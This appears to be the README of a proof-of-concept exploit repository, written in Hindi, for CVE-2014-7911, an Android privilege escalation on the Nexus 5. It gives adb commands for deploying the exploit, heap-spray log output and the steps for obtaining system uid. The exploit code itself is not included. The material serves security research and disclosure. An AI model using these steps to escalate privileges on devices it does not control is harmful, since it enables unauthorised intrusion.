
CVE-2014-7911 के लिए एंड्रॉइड स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) का प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Nexus5 को लक्षित करता है, ROP चेन और हीप स्प्रेइंग के साथ सिस्टम uid प्राप्त करने के लिए।
Nexus5 Android 4.4.4_r1 के लिए CVE-2014-7911 का POC, retme7 पर आधारित, अलग rop chain का उपयोग करता है
अपने फ़ोन को adb के माध्यम से कनेक्ट करें
adb push jni/expolit /data/local/tmp
adb logcat | grep auo_
इस POC को लॉन्च करें, “CVE-2014-7911” बटन पर क्लिक करें, आप यह देखेंगे:
D/auo_CVE20147911(24892): staticAddr = 0x43a1f000
D/auo_CVE20147911(24892): heap sparying... 0
D/auo_CVE20147911(24892): heap sparying... 100
D/auo_CVE20147911(24892): heap sparying... 200
D/auo_CVE20147911(24892): heap sparying... 300
D/auo_CVE20147911(24892): heap sparying... 400
D/auo_CVE20147911(24892): heap sparying... 500
D/auo_CVE20147911(24892): heap sparying... 600
D/auo_CVE20147911(24892): heap sparying... 700
D/auo_CVE20147911(24892): heap sparying... 800
D/auo_CVE20147911(24892): heap sparying... 900
D/auo_CVE20147911(24892): heap sparying... 1000
D/auo_CVE20147911(24892): heap sparying... 1100
D/auo_CVE20147911(24892): heap sparying... 1200
D/auo_CVE20147911(24892): heap sparying... 1300
D/auo_CVE20147911(24892): heap sparying... 1400
D/auo_CVE20147911(24892): heap sparying... 1500
D/auo_CVE20147911(24892): heap sparying... 1600
D/auo_CVE20147911(24892): heap sparying... 1700
D/auo_CVE20147911(24892): heap sparying... 1800
D/auo_CVE20147911(24892): heap sparying... 1900
फिर सिस्टम क्रैश होने तक एक्टिविटी को कई बार छोटा करें, यदि आप यह देखते हैं:
D/auo_exploit(22665): uid=1000(system) gid=1000(system)
एक्सप्लॉइट सफल हो गया है; यदि आपका फ़ोन केवल क्रैश होता है, तो आपका डिवाइस असुरक्षित है, एक्सप्लॉइट विफल हो सकता है (आपको अलग ROP चेन खोजनी चाहिए)।